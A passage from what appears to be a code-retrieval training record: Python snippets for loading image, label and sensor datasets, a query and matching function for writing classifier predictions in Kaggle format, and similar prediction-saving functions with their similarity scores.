"def load_data(self) -> tuple:\n label_num = {}\n data_set = pathlib.Path(self.path)\n data = []\n\n # create the label lookup dict for verifcation later\n for i, v in enumerate(data_set.iterdir()):\n label_num[v.name] = i\n self.labels[i] = v.name\n # end\n\n # read images\n for img_path in data_set.rglob(\"*.jpg\"):\n lbl = label_num[str(img_path.parent.stem)]\n img = cv2.imread(str(img_path))\n img = cv2.resize(img, self.dims, interpolation=cv2.INTER_AREA)\n\n # flatten RGB data into a vector\n # NOTE: NOT ACTUALLY NECESSARY! \n img.flatten()\n\n # label the sample and append to temp data list\n sample = np.append(lbl, img)\n data.append(sample)\n # end\n\n # partition and package the data (*_ ensures safe unpacking)\n train, test, validate, *_ = Data.partition(data, self.parts, 0.7, 0.2)\n self.train = Data(train)\n self.test = Data(test)\n self.validate = Data(validate)",
"def _read_data(self):",
"def read_raw_data(self):\n # Must be set by the user\n raise Exception(\"not implemented\")",
"def unpack_data(imagefile, labelfile):\n\t# Open the images with gzip in read binary mode\n\timages = open(imagefile, 'rb')\n\tlabels = open(labelfile, 'rb')\n\t# Read the binary data\n\t# We have to get big endian unsigned int. So we need '>I'\n\t# Get metadata for images\n\timages.read(4) # skip the magic_number\n\tnumber_of_images = images.read(4)\n\tnumber_of_images = unpack('>I', number_of_images)[0]\n\trows = images.read(4)\n\trows = unpack('>I', rows)[0]\n\tcols = images.read(4)\n\tcols = unpack('>I', cols)[0]\n\n\t# Get metadata for labels\n\tlabels.read(4) # skip the magic_number\n\tN = labels.read(4)\n\tN = unpack('>I', N)[0]\n\n\tif number_of_images != N:\n\t\traise Exception('number of labels did not match the number of images')\n\t# Get the data\n\tx = zeros((N, rows, cols), dtype=float32) # Initialize numpy array\n\ty = zeros((N, 1), dtype=uint8) # Initialize numpy array\n\tfor i in range(N):\n\t\tif i % 1000 == 0:\n\t\t\tprint(\"i: %i\" % i)\n\t\tfor row in range(rows):\n\t\t\tfor col in range(cols):\n\t\t\t\ttmp_pixel = images.read(1) # Just a single byte\n\t\t\t\ttmp_pixel = unpack('>B', tmp_pixel)[0]\n\t\t\t\tx[i][row][col] = tmp_pixel\n\t\ttmp_label = labels.read(1)\n\t\ty[i] = unpack('>B', tmp_label)[0]\n\treturn x, y",
"def read_label_file(self, label_file_name = None): #completed\n if label_file_name is None:\n label_file_name = self.label_file_name\n try:\n label_data = sp.loadmat(label_file_name)['labels'].astype(np.int32)\n return label_data#[:,1], label_data[:,0]#in MATLAB format\n except IOError:\n print \"Unable to open \", label_file_name, \"... Exiting now\"\n sys.exit()",
"def parse_label(self):\n # TODO: make this work with attached labels as well as\n # stand alone labels.\n # Save the RAW full text of the label to self._raw\n input_stream = FileStream(self.infile)\n lexer = ODLv21Lexer(input_stream)\n tokens = CommonTokenStream(lexer)\n\n parser = ODLv21Parser(tokens)\n parse_tree = parser.label()\n self._parse_tree = parse_tree\n visitor = Pds3LabelVisitor()\n visitor.visit(parse_tree)\n return visitor.root_dict",
"def load_labels(filename):\n\n file_path = os.path.join(DATA_DIR, filename)\n with open(file_path, 'rb') as f:\n b = f.read()\n\n magic, n_labels = (struct.unpack('>i', b[i*4:(i+1)*4]) for i in range(2))\n\n assert magic[0] == 2049, \"bad magic number, what do?\"\n\n label_stream = array.array('B', b[8:])\n \n assert len(label_stream) == n_labels[0], \"mismatch in label length\"\n \n # label_stream is actually type array.array, which is iterable surely.\n # i'll convert it anyway...\n return tuple(label_stream)",
"def load_data_part(fname):\n if \"_data\" not in fname:\n return None\n # Read data\n data = pd.read_csv(fname)\n # events file\n events_fname = fname.replace('_data', '_events')\n # read event file\n labels = pd.read_csv(events_fname)\n clean = data.drop(['id'], axis=1) # remove id\n labels = labels.drop(['id'], axis=1) # remove id\n return clean, labels",
"def load_data(self):\n print(\"Loading dataset...\")\n # Load the dataset\n subIDs, data, labels = dl.load_processed_data_N_subjects_allchans(\n '../data_5sec_100Hz_bipolar/', Nsub=14)\n\n if len(data) > 1:\n\n # If more than one patient loaded, append data to single array\n data_arr = np.array(data[0])\n label_arr = labels[0]\n\n for sub in range(1, len(data)):\n data_arr = np.append(data_arr, data[sub], axis=1)\n label_arr = np.append(label_arr, labels[sub], axis=0)\n\n else:\n # Remove the extra dimension at axis=0\n data_array = np.squeeze(data)\n labels = np.squeeze(labels)\n\n # Move trials to the end so data array is 'nchan x timeseries x trials'\n self.data = np.moveaxis(data_arr, 1, -1)\n self.labels = np.array(label_arr)\n\n self.label_strings = dl.available_stringlabels\n\n valid_indices = np.sum(self.labels, axis=0)\n names = [[self.label_strings[i], i, valid_indices[i]] for i in range(len(valid_indices)) if valid_indices[i] > 0]\n print(\"A summary of valid labels is below: \\nFormat: [Label name, label index, Label count]\")\n for i in range(len(names)):\n print(names[i])\n return",
"def load_data(self):\n self.tif_file = self._find_tif_file()\n if self.with_labeling is not None:\n self.colabel_file = self._find_colabeled_file()\n self.colabel_stack = self._load_colabeled_img()\n self.dff, self.indices = self._populate_dff_data()\n self.loaded = True",
"def readData(self):\n f = open(self.filename)\n self.time = []\n self.data = []\n for line in f:\n if line.find('BAD FLAG') > 0:\n self.badValue = float(line.split(':')[1].strip())\n if line.find('LONGITUDE') > 0:\n self.lon = line.split(':')[1].strip()\n if line.find('LATITUDE') > 0:\n self.lat = line.split(':')[1].strip()\n if len(line) > 6 and line[2] == '-' and line[6] == '-':\n parts = line.rsplit(None, 1)\n # data line\n timeStamp = datetime.datetime.strptime(parts[0], '%d-%b-%Y %H')\n t = timeArray.datetimeToEpochTime(timeStamp)\n self.time.append(t)\n val = float(parts[1])\n self.data.append(val)\n\n self.time = np.array(self.time)\n self.data = np.array(self.data)\n # remove bad values\n if self.badValue:\n goodIx = self.data != self.badValue\n self.time = self.time[goodIx]\n self.data = self.data[goodIx]\n self.fileIsRead = True",
"def load_data(filename):\r\n with open(filename,'rb') as f:\r\n data = pk.load(f,encoding='bytes')\r\n return data[b'data'],data[b'labels']",
"def read_stanford_labels():\n # First get the hardi data\n fetch_stanford_hardi()\n hard_img, gtab = read_stanford_hardi()\n\n # Fetch and load\n files, folder = fetch_stanford_labels()\n labels_file = pjoin(folder, \"aparc-reduced.nii.gz\")\n labels_img = nib.load(labels_file)\n return hard_img, gtab, labels_img",
"def load_data_pkl(self):\n pkl_name = '{}/data/mini-imagenet-cache-{}.pkl'.format(self.root_dir, self.split)\n print('Loading pkl dataset: {} '.format(pkl_name))\n\n try:\n with open(pkl_name, \"rb\") as f:\n data = pkl.load(f, encoding='bytes')\n image_data = data[b'image_data']\n class_dict = data[b'class_dict']\n except:\n with open(pkl_name, \"rb\") as f:\n data = pkl.load(f)\n image_data = data['image_data']\n class_dict = data['class_dict']\n\n print(data.keys(), image_data.shape, class_dict.keys())\n data_classes = sorted(class_dict.keys()) # sorted to keep the order\n\n n_classes = len(data_classes)\n print('n_classes:{}, n_label:{}, n_unlabel:{}'.format(n_classes,self.n_label,self.n_unlabel))\n dataset_l = np.zeros([n_classes, self.n_label, self.im_height, self.im_width, self.channels], dtype=np.float32)\n if self.n_unlabel>0:\n dataset_u = np.zeros([n_classes, self.n_unlabel, self.im_height, self.im_width, self.channels], dtype=np.float32)\n else:\n dataset_u = []\n\n for i, cls in enumerate(data_classes):\n idxs = class_dict[cls] \n np.random.RandomState(self.seed).shuffle(idxs) # fix the seed to keep label,unlabel fixed\n dataset_l[i] = image_data[idxs[0:self.n_label]]\n if self.n_unlabel>0:\n dataset_u[i] = image_data[idxs[self.n_label:]]\n print('labeled data:', np.shape(dataset_l))\n print('unlabeled data:', np.shape(dataset_u))\n \n self.dataset_l = dataset_l\n self.dataset_u = dataset_u\n self.n_classes = n_classes\n\n del image_data",
"def getLabeledXYonly(self, trainingData):\r\n labeledData, unlabeledData = trainingData\r\n return labeledData",
"def read_data(self, loc):\n pass",
"def _read_column_labels(self):\n\n # read the label line (should be at row 15 of the file at this point)\n label_list = self._stream_handle.readline().strip().split()\n self.num_columns = len(label_list)\n self._header_dict['labels'] = label_list\n\n # the m_present_time label is required to generate particles, raise an exception if it is not found\n if GliderParticleKey.M_PRESENT_TIME not in label_list:\n raise DatasetParserException('The m_present_time label has not been found, which means the timestamp '\n 'cannot be determined for any particles')\n\n # read the units line (should be at row 16 of the file at this point)\n data_unit_list = self._stream_handle.readline().strip().split()\n data_unit_list_length = len(data_unit_list)\n\n # read the number of bytes line (should be at row 17 of the file at this point)\n num_of_bytes_list = self._stream_handle.readline().strip().split()\n num_of_bytes_list_length = len(num_of_bytes_list)\n\n # number of labels for name, unit, and number of bytes must match\n if data_unit_list_length != self.num_columns or self.num_columns != num_of_bytes_list_length:\n raise DatasetParserException(\"The number of columns in the labels row: %d, units row: %d, \"\n \"and number of bytes row: %d are not equal.\"\n % (self.num_columns, data_unit_list_length, num_of_bytes_list_length))\n\n # if the number of columns from the header does not match that in the data, but the rest of the file has\n # the same number of columns in each line this is not a fatal error, just parse the columns that are present\n if self._header_dict['sensors_per_cycle'] != self.num_columns:\n msg = 'sensors_per_cycle from header %d does not match the number of data label columns %d' % \\\n (self._header_dict['sensors_per_cycle'], self.num_columns)\n self._exception_callback(SampleException(msg))\n\n log.debug(\"Label count: %d\", self.num_columns)",
"def load_data(self):\n print('Loading {} dataset'.format(self.split))\n data_split_path = os.path.join(self.root_dir, 'splits', '{}.csv'.format(self.split))\n with open(data_split_path,'r') as f:\n reader = csv.reader(f, delimiter=',')\n data_classes = {}\n for i,row in enumerate(reader):\n if i==0:\n continue\n data_classes[row[1]] = 1\n data_classes = data_classes.keys()\n print(data_classes)\n\n n_classes = len(data_classes)\n print('n_classes:{}, n_label:{}, n_unlabel:{}'.format(n_classes,self.n_label,self.n_unlabel))\n dataset_l = np.zeros([n_classes, self.n_label, self.im_height, self.im_width, self.channels], dtype=np.float32)\n if self.n_unlabel>0:\n dataset_u = np.zeros([n_classes, self.n_unlabel, self.im_height, self.im_width, self.channels], dtype=np.float32)\n else:\n dataset_u = []\n\n for i, cls in enumerate(data_classes):\n im_dir = os.path.join(self.root_dir, 'data/{}/'.format(self.split), cls)\n im_files = sorted(glob.glob(os.path.join(im_dir, '*.jpg')))\n np.random.RandomState(self.seed).shuffle(im_files) # fix the seed to keep label,unlabel fixed\n for j, im_file in enumerate(im_files):\n im = np.array(Image.open(im_file).resize((self.im_width, self.im_height)), \n np.float32, copy=False)\n if j<self.n_label:\n dataset_l[i, j] = im\n else:\n dataset_u[i,j-self.n_label] = im\n print('labeled data:', np.shape(dataset_l))\n print('unlabeled data:', np.shape(dataset_u))\n \n self.dataset_l = dataset_l\n self.dataset_u = dataset_u\n self.n_classes = n_classes"
] |
[
"0.62985724",
"0.60218835",
"0.5822445",
"0.57796115",
"0.5738949",
"0.5676225",
"0.56441987",
"0.56067234",
"0.55868876",
"0.5516113",
"0.5516113",
"0.54691124",
"0.54412436",
"0.54277503",
"0.54168564",
"0.5415407",
"0.5414791",
"0.54146427",
"0.5388492",
"0.5371088",
"0.5360211",
"0.53376824",
"0.53200287",
"0.5319091",
"0.53183085",
"0.53137285",
"0.5307876",
"0.5250194",
"0.52357775",
"0.5229399"
] |
0.6559793
|
0
|
Writes the predictions in Kaggle format. Given the classifier, the output filename, and the speech object, this function writes the classifier's predictions on the test data to the output file.
|
def write_pred_kaggle_file(cls, outfname, speech):
    yp = cls.predict(speech.test_doc_vec)
    labels = speech.le.inverse_transform(yp)
    f = codecs.open(outfname, 'w')
    f.write("FileIndex,Category\n")
    for i in range(len(speech.test_fnames)):
        fname = speech.test_fnames[i]
        f.write(fname + ',' + labels[i] + '\n')
    f.close()
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def save_predictions(self,file_path):\n # compute average of predictions\n num_examples = len(self.labels)\n\n if num_examples == 0:\n raise Exception (\"nothing to save\")\n\n def string_to_average(string):\n return np.average(np.array(string.split(\",\"),dtype=float))\n prediction_averages = np.around(map(string_to_average,self.predictions),decimals=3)\n\n # sort by prediction averages\n order = np.flipud(prediction_averages.argsort())\n prediction_averages = prediction_averages[order]\n self.pl_pairs = self.pl_pairs[order]\n self.predictions = self.predictions[order]\n self.labels = self.labels[order]\n # write all of the predictions to the file\n f = open(file_path + \"_predictions.txt\", 'w')\n\n for i in range(num_examples):\n f.write((str(prediction_averages[i]) + \" \"*10)[:10]\n + (str(self.labels[i]) + \" \"*50)[:10]\n + str(self.pl_pairs[i] + \" \"*50)[:50]\n + str(self.predictions[i] + \" \"*50)[:50]\n + \"\\n\")\n\n f.close()\n # write and save some metadata\n\n f = open(file_path + \"_scores.txt\", 'w')\n f.write(\"top 100 score: \")\n f.write(str(self.top_100_score(self.predictions,self.labels)))\n f.write(\"\\nAUC: \")\n f.write(str(self.auc(prediction_averages,self.labels)))\n f.write(\"\\nconfusion matrix: \")\n f.write(str(self.confusion_matrix(prediction_averages,self.labels)))\n f.close()\n\n # write a file in Kaggle MAP{K} submision format\n # the form is:\n # Protein1, Ligand3 Ligand4 Ligand2\n # Protein2, Ligand5 Ligand9 Ligand7\n\n raw_database_array = np.genfromtxt(FLAGS.test_set_file_path, delimiter=',', dtype=str)\n receptor_set = raw_database_array[:,2]\n receptor_set = list(set(map(lambda x:x.split('.')[0].split('/')[-1],receptor_set)))\n submission = {}\n for i in range(num_examples):\n # get the name of the ligand and protein\n ligand,receptor = self.pl_pairs[i].split(',')\n ligand = ligand.split('/')[-1].split('.')[0]\n receptor = receptor.split('/')[-1].split('.')[0]\n # add all protein-ligand pairs to submission\n if not receptor in submission.keys():\n submission[receptor] = {}\n submission[receptor]['ligands'] = [ligand]\n submission[receptor]['score'] = [prediction_averages[i]]\n else:\n submission[receptor]['ligands'].append(ligand)\n submission[receptor]['score'].append(prediction_averages[i])\n \n # write and save submisison to file\n # if failed to predict any liagnd for a receptor\n # use placeholder 'L' as predict result\n # e.g. P1234,L\n with open(file_path+'_submission.csv','w') as f:\n f.write('Id,Expected\\n')\n for key in receptor_set:\n if key in submission.keys():\n ligands = np.array(submission[key]['ligands'])\n scores = np.array(submission[key]['score'])\n ligands = ligands[np.flipud(scores.argsort())]\n f.write(key+','+' '.join(ligands)+'\\n')\n else:\n f.write(key+','+'L'+'\\n')",
"def write_classifier_output(location, folds, labels, predictions, class_probs, names=None):\n with open(os.path.join(location, '-'.join([\"classifier\", \"fold\", \"predictions\"]) + '.txt'), 'w') as out_file:\n for fold in range(folds):\n out_file.write(\"fold \" + str(fold+1) + ':\\n')\n out_file.write(\"{:50} {:<12} {:<12} {:<9} {:<9}\\n\".format(\"recording\", \"prediction\", \"label\", \"class 0\",\n \"class 1\"))\n fold_labels, fold_predictions, fold_class_probs = labels[fold], predictions[fold], class_probs[fold]\n\n if names is not None and len(names) != 0:\n fold_names = np.hstack(names[fold])\n else:\n fold_names = len(fold_predictions) * ['']\n\n for pred_lab_tuple in zip(fold_names, fold_predictions, fold_labels, fold_class_probs[:, 0],\n fold_class_probs[:, 1]):\n (name, pred, label, prob1, prob2) = pred_lab_tuple\n out_file.write(\"{:50} {:<12} {:<12} {:<9.2f} {:<9.2f}\\n\".format(name, pred, label, prob1, prob2))\n out_file.write('\\n')",
"def output_predictions(predictions, output_file=None, output_format=\"plaintext\", info=None):\n\n content = \"\"\n\n if (output_format == \"plaintext\") or (output_format == \"txt\"):\n lines = []\n for k in predictions:\n lines.append(\"- %s: %s\" % (k, predictions[k]))\n content = \"\\n\".join(lines)\n\n elif output_format == \"csv\":\n output = io.StringIO()\n writer = csv.writer(output, quoting=csv.QUOTE_NONNUMERIC)\n writer.writerow([\"label\", \"probability\"])\n for k in predictions:\n writer.writerow([k, float(predictions[k])])\n content = output.getvalue()\n\n elif output_format == \"xml\":\n root = ET.Element(\"predictions\")\n if info is not None:\n for k in info:\n root.set(k, info[k])\n root.set(\"timestamp\", str(datetime.now()))\n for k in predictions:\n p = ET.SubElement(root, \"prediction\")\n p.set(\"label\", k)\n p.text = str(float(predictions[k]))\n content = minidom.parseString(ET.tostring(root)).toprettyxml(indent = \" \")\n\n elif output_format == \"json\":\n data = dict()\n if info is not None:\n info = copy.copy(info)\n else:\n info = dict()\n info[\"timestamp\"] = str(datetime.now())\n data[\"info\"] = info\n data[\"predictions\"] = dict()\n for k in predictions:\n data[\"predictions\"][k] = float(predictions[k])\n content = json.dumps(data)\n\n else:\n raise Exception(\"Unhandled format: %s\" % output_format)\n\n if output_file is None:\n print(content)\n else:\n with open(output_file, \"w\") as of:\n of.write(content)",
"def save(self, output_folder: str, show_confidence: bool = True) -> None:\n if output_folder:\n os.makedirs(output_folder, exist_ok=True)\n\n for i, prediction in enumerate(self._images_prediction_lst):\n image_output_path = os.path.join(output_folder, f\"pred_{i}.jpg\")\n prediction.save(output_path=image_output_path, show_confidence=show_confidence)",
"def write_predictions(self, predictions, file_path=None, is_dict=True, pycm_obj=None):\n\n try:\n super(SequenceClassification, self).write_predictions(\n predictions, file_path=file_path, is_dict=is_dict\n )\n except AttributeError:\n # TODO: Need to Fix\n model_base = ModelBase()\n model_base._log_dir = self._log_dir\n model_base._train_counter = self._train_counter\n model_base.training = self.training\n model_base.write_predictions(predictions, file_path=file_path, is_dict=is_dict)\n\n data_type = \"train\" if self.training else \"valid\"\n\n if pycm_obj is not None:\n stats_file_path = f\"predictions-{data_type}-{self._train_counter.get_display()}-stats\"\n pycm_obj.save_csv(str(Path(self._log_dir) / \"predictions\" / stats_file_path))\n\n confusion_matrix_file_path = (\n f\"predictions-{data_type}-{self._train_counter.get_display()}-confusion_matrix\"\n )\n cls_utils.write_confusion_matrix_to_csv(\n str(Path(self._log_dir) / \"predictions\" / confusion_matrix_file_path), pycm_obj\n )",
"def output_predictions(predictions_file, relations, predictions, test_set_keys, test_labels):\n with codecs.open(predictions_file, 'w', 'utf-8') as f_out:\n for i, (w1, w2) in enumerate(test_set_keys):\n f_out.write('\\t'.join([w1, w2, relations[test_labels[i]], relations[predictions[i]]]) + '\\n')",
"def store_classes_and_predictions(output_file_path, classes, predictions):\n with open(output_file_path, mode='a', newline='') as csvfile:\n csvwriter = csv.writer(csvfile, delimiter=',')\n csvwriter.writerow(['true', 'predicted'])\n for i in range(len(classes)):\n csvwriter.writerow([classes.iloc[i], predictions.iloc[i]])",
"def write_predictions_to_file(predictor, testDataFname, enc, outputFname, features=None):\n\n testData, _, testDataIds, _ = make_data(testDataFname, features=features, enc=enc)\n\n dt = datetime.now()\n predictions = predictor.predict(testData)\n print 'predicting took', datetime.now() - dt\n\n featureSelectionOutput = np.transpose(np.vstack((testDataIds, predictions.round().astype(int))))\n\n with open(outputFname, 'wb') as outputFile:\n writer = csv.writer(outputFile)\n writer.writerow(['id', 'loss'])\n writer.writerows(featureSelectionOutput)",
"def save_predictions(model, dataset, output_dir):\n preds = model.predict(dataset, verbose=1)\n preds = scipy.special.softmax(preds, 1) # Apply softmax\n with tf.io.gfile.GFile(os.path.join(output_dir, 'test_preds.pkl'), 'wb') as f:\n pickle.dump(preds, f)",
"def write_predictions(prediction_dic, result_path):\n with open(result_path, 'wb') as outfile:\n outfile.write(bytes('Patient_ID,HPV/p16_status\\n', 'UTF-8'))\n for patient_id, pred in prediction_dic.items():\n outfile.write(bytes(str(patient_id) + ',' + str(pred) + '\\n', 'UTF-8'))",
"def save_predictions_in_panoptic_format(model,\n checkpoint_name,\n data_split,\n score_threshold,\n global_step):\n\n dataset = model.dataset\n # Round this because protobuf encodes default values as full decimal\n score_threshold = round(score_threshold, 3)\n\n # Get available prediction folders\n predictions_root_dir = pplp.root_dir() + '/data/outputs/' + \\\n checkpoint_name + '/predictions'\n\n final_predictions_root_dir = predictions_root_dir + \\\n '/final_predictions_and_scores/' + dataset.data_split\n\n final_predictions_dir = final_predictions_root_dir + \\\n '/' + str(global_step)\n\n # 3D prediction directories\n panoptic_predictions_3d_dir = predictions_root_dir + \\\n '/panoptic_pplp_eval/' + \\\n str(score_threshold) + '/' + \\\n str(global_step) + '/data'\n\n if not os.path.exists(panoptic_predictions_3d_dir):\n os.makedirs(panoptic_predictions_3d_dir)\n\n # Do conversion\n num_samples = dataset.num_samples\n num_valid_samples = 0\n\n print('\\nGlobal step:', global_step)\n print('Converting detections from:', final_predictions_dir)\n\n print('3D Detections being saved to:', panoptic_predictions_3d_dir)\n\n for sample_idx in range(num_samples):\n # Print progress\n sys.stdout.write('\\rConverting {} / {}'.format(\n sample_idx + 1, num_samples))\n sys.stdout.flush()\n\n sample_name = dataset.sample_names[sample_idx]\n\n prediction_file = sample_name + '.txt'\n\n panoptic_predictions_3d_file_path = panoptic_predictions_3d_dir + \\\n '/' + prediction_file\n\n predictions_file_path = final_predictions_dir + \\\n '/' + prediction_file\n\n # If no predictions, skip to next file\n if not os.path.exists(predictions_file_path):\n np.savetxt(panoptic_predictions_3d_file_path, [])\n continue\n\n all_predictions = np.loadtxt(predictions_file_path)\n\n # # Swap l, w for predictions where w > l\n # swapped_indices = all_predictions[:, 4] > all_predictions[:, 3]\n # fixed_predictions = np.copy(all_predictions)\n # fixed_predictions[swapped_indices, 3] = all_predictions[\n # swapped_indices, 4]\n # fixed_predictions[swapped_indices, 4] = all_predictions[\n # swapped_indices, 3]\n\n all_predictions = np.array(all_predictions)\n\n # change 1D array in to 2D array even if it has only one row.\n if len(all_predictions.shape) == 1:\n all_predictions.shape = (1, -1)\n\n score_filter = all_predictions[:, 7] >= score_threshold\n all_predictions = all_predictions[score_filter]\n # If no predictions, skip to next file\n if len(all_predictions) == 0:\n np.savetxt(panoptic_predictions_3d_file_path, [])\n continue\n\n # Project to image space\n sample_name = prediction_file.split('.')[0]\n img_idx = int(sample_name)\n\n # Load image for truncation\n image = Image.open(dataset.get_rgb_image_path(sample_name))\n\n stereo_calib_p2 = calib_panoptic_utils.read_calibration(dataset.calib_dir,\n img_idx).HD_11\n\n boxes = []\n image_filter = []\n for i in range(len(all_predictions)):\n box_3d = all_predictions[i, 0:7]\n img_box = box_3d_panoptic_projector.project_to_image_space(\n box_3d, stereo_calib_p2,\n truncate=True, image_size=image.size)\n\n # Skip invalid boxes (outside image space)\n if img_box is None:\n image_filter.append(False)\n print('**ERROR img_box = ', img_box)\n continue\n\n image_filter.append(True)\n boxes.append(img_box)\n\n boxes = np.asarray(boxes)\n all_predictions = all_predictions[image_filter]\n\n # If no predictions, skip to next file\n if len(boxes) == 0:\n np.savetxt(panoptic_predictions_3d_file_path, [])\n continue\n\n num_valid_samples += 1\n\n # To keep each value in its 
appropriate position, an array of zeros\n # (N, 16) is allocated but only values [4:16] are used\n panoptic_predictions = np.zeros([len(boxes), 16])\n\n # Get object types\n all_pred_classes = all_predictions[:, 8].astype(np.int32)\n obj_types = [dataset.classes[class_idx]\n for class_idx in all_pred_classes]\n\n # Truncation and Occlusion are always empty (see below)\n\n # Alpha (Not computed)\n panoptic_predictions[:, 3] = -10 * np.ones((len(panoptic_predictions)),\n dtype=np.int32)\n\n # 2D predictions\n panoptic_predictions[:, 4:8] = boxes[:, 0:4]\n\n # 3D predictions\n # (l, w, h)\n panoptic_predictions[:, 8] = all_predictions[:, 5]\n panoptic_predictions[:, 9] = all_predictions[:, 4]\n panoptic_predictions[:, 10] = all_predictions[:, 3]\n # (x, y, z)\n panoptic_predictions[:, 11:14] = all_predictions[:, 0:3]\n # (ry, score)\n panoptic_predictions[:, 14:16] = all_predictions[:, 6:8]\n\n # Round detections to 3 decimal places\n panoptic_predictions = np.round(panoptic_predictions, 3)\n\n # Empty Truncation, Occlusion\n panoptic_empty_1 = -1 * np.ones((len(panoptic_predictions), 2),\n dtype=np.int32)\n\n # Stack 3D predictions text\n panoptic_text_3d = np.column_stack([obj_types,\n panoptic_empty_1,\n panoptic_predictions[:, 3:16]])\n\n # Save to text files\n np.savetxt(panoptic_predictions_3d_file_path, panoptic_text_3d,\n newline='\\r\\n', fmt='%s')\n\n print('\\nNum valid:', num_valid_samples)\n print('Num samples:', num_samples)",
"def write_predictions(y_pred, filename, yname=None) :\n out = open(filename, 'wb')\n f = csv.writer(out)\n if yname :\n f.writerow([yname])\n f.writerows(zip(y_pred))\n out.close()",
"def write_predictions(y_pred, filename, yname=None) :\n out = open(filename, 'wb')\n f = csv.writer(out)\n if yname :\n f.writerow([yname])\n f.writerows(list(zip(y_pred)))\n out.close()",
"def write_predictions(y_pred, filename, yname=None) :\n out = open(filename, 'wb')\n f = csv.writer(out)\n if yname :\n f.writerow([yname])\n f.writerows(list(zip(y_pred)))\n out.close()",
"def write_predictions(all_examples, all_features, all_results, n_best_size,\n max_answer_length, do_lower_case, output_prediction_file,\n output_nbest_file, verbose_logging):\n logger.info(\"Writing predictions to: %s\" % (output_prediction_file))\n logger.info(\"Writing nbest to: %s\" % (output_nbest_file))\n\n example_index_to_features = collections.defaultdict(list)\n for feature in all_features:\n example_index_to_features[feature.example_index].append(feature)\n\n unique_id_to_result = {}\n for result in all_results:\n unique_id_to_result[result.unique_id] = result\n\n _PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name\n \"PrelimPrediction\",\n [\"feature_index\", \"start_index\", \"end_index\", \"start_logit\", \"end_logit\", \"label_logit\"])\n\n all_predictions = collections.OrderedDict()\n all_nbest_json = collections.OrderedDict()\n for (example_index, example) in enumerate(all_examples):\n features = example_index_to_features[example_index]\n\n prelim_predictions = []\n for (feature_index, feature) in enumerate(features):\n result = unique_id_to_result[feature.unique_id]\n\n start_indexes = _get_best_indexes(result.start_logits, n_best_size)\n end_indexes = _get_best_indexes(result.end_logits, n_best_size)\n for start_index in start_indexes:\n for end_index in end_indexes:\n # We could hypothetically create invalid predictions, e.g., predict\n # that the start of the span is in the question. We throw out all\n # invalid predictions.\n if start_index >= len(feature.tokens):\n continue\n if end_index >= len(feature.tokens):\n continue\n if start_index not in feature.token_to_orig_map:\n continue\n if end_index not in feature.token_to_orig_map:\n continue\n if not feature.token_is_max_context.get(start_index, False):\n continue\n if end_index < start_index:\n continue\n length = end_index - start_index + 1\n if length > max_answer_length:\n continue\n prelim_predictions.append(\n _PrelimPrediction(\n feature_index=feature_index,\n start_index=start_index,\n end_index=end_index,\n start_logit=result.start_logits[start_index],\n end_logit=result.end_logits[end_index],\n label_logit=result.label_logits))\n\n prelim_predictions = sorted(\n prelim_predictions,\n key=lambda x: (x.start_logit + x.end_logit),\n reverse=True)\n\n _NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name\n \"NbestPrediction\", [\"text\", \"start_logit\", \"end_logit\", \"label_logit\"])\n\n seen_predictions = {}\n nbest = []\n for pred in prelim_predictions:\n if len(nbest) >= n_best_size:\n break\n feature = features[pred.feature_index]\n\n tok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)]\n orig_doc_start = feature.token_to_orig_map[pred.start_index]\n orig_doc_end = feature.token_to_orig_map[pred.end_index]\n orig_tokens = example.doc_tokens[orig_doc_start:(orig_doc_end + 1)]\n tok_text = \" \".join(tok_tokens)\n\n # De-tokenize WordPieces that have been split off.\n tok_text = tok_text.replace(\" ##\", \"\")\n tok_text = tok_text.replace(\"##\", \"\")\n\n # Clean whitespace\n tok_text = tok_text.strip()\n tok_text = \" \".join(tok_text.split())\n orig_text = \" \".join(orig_tokens)\n\n final_text = get_final_text(tok_text, orig_text, do_lower_case, verbose_logging)\n if final_text in seen_predictions:\n continue\n\n seen_predictions[final_text] = True\n nbest.append(\n _NbestPrediction(\n text=final_text,\n start_logit=pred.start_logit,\n end_logit=pred.end_logit,\n label_logit=pred.label_logit))\n\n # In very rare edge cases we could have no 
valid predictions. So we\n # just create a nonce prediction in this case to avoid failure.\n if not nbest:\n nbest.append(\n _NbestPrediction(text=\"empty\", start_logit=0.0, end_logit=0.0, label_logit=0.0))\n\n assert len(nbest) >= 1\n\n total_scores = []\n for entry in nbest:\n total_scores.append(entry.start_logit + entry.end_logit)\n\n probs = _compute_softmax(total_scores)\n\n nbest_json = []\n for (i, entry) in enumerate(nbest):\n output = collections.OrderedDict()\n output[\"text\"] = entry.text\n output[\"probability\"] = probs[i]\n output[\"start_logit\"] = entry.start_logit\n output[\"end_logit\"] = entry.end_logit\n output[\"label_logit\"] = entry.label_logit\n nbest_json.append(output)\n\n assert len(nbest_json) >= 1\n\n if nbest_json[0][\"label_logit\"] and (example.qas_id not in all_predictions.keys() or all_nbest_json[example.qas_id][0][\"probability\"] < nbest_json[0][\"probability\"]):\n all_predictions[example.qas_id] = nbest_json[0][\"text\"]\n all_nbest_json[example.qas_id] = nbest_json\n\n with open(output_prediction_file, \"w\") as writer:\n writer.write(json.dumps(all_predictions, indent=4) + \"\\n\")\n\n with open(output_nbest_file, \"w\") as writer:\n writer.write(json.dumps(all_nbest_json, indent=4) + \"\\n\")",
"def predict(self):\n train_vec, test_vec = self.get_tfidf_vectors()\n clf = self.get_classifier()\n\n print '-'*40\n print 'Making predictions ...'\n clf.fit(train_vec, self.train_ans)\n clf_predictions = clf.predict_proba(test_vec)\n\n print 'Storing predictions in', self.pred_file\n pred_out = [\"Id,predictions\"]\n num_pred = range(30)\n for fid, pred in zip(self.test_index, clf_predictions):\n top_rec = sorted(num_pred, key=lambda k: pred[k], reverse=True)[:3]\n pred_out.append(\"%s,%s\" % (fid, ' '.join( [clf.classes_[rec] for rec in top_rec] )))\n with open(self.pred_file, 'w') as f:\n f.write('%s\\n' % ('\\n'.join(pred_out)))",
"def save_predictions(predictions, img_paths, output_dir='predictions'):\n\n print(f'\\nSaving prediction to {output_dir} ...')\n\n if not osp.exists(output_dir):\n os.mkdir(output_dir)\n\n for pred, img_path in tqdm(zip(predictions, img_paths), total=len(predictions)):\n img_name = osp.basename(img_path)\n pred = pred.astype('uint8')\n Image.fromarray(pred * 255).save(osp.join(output_dir, img_name))",
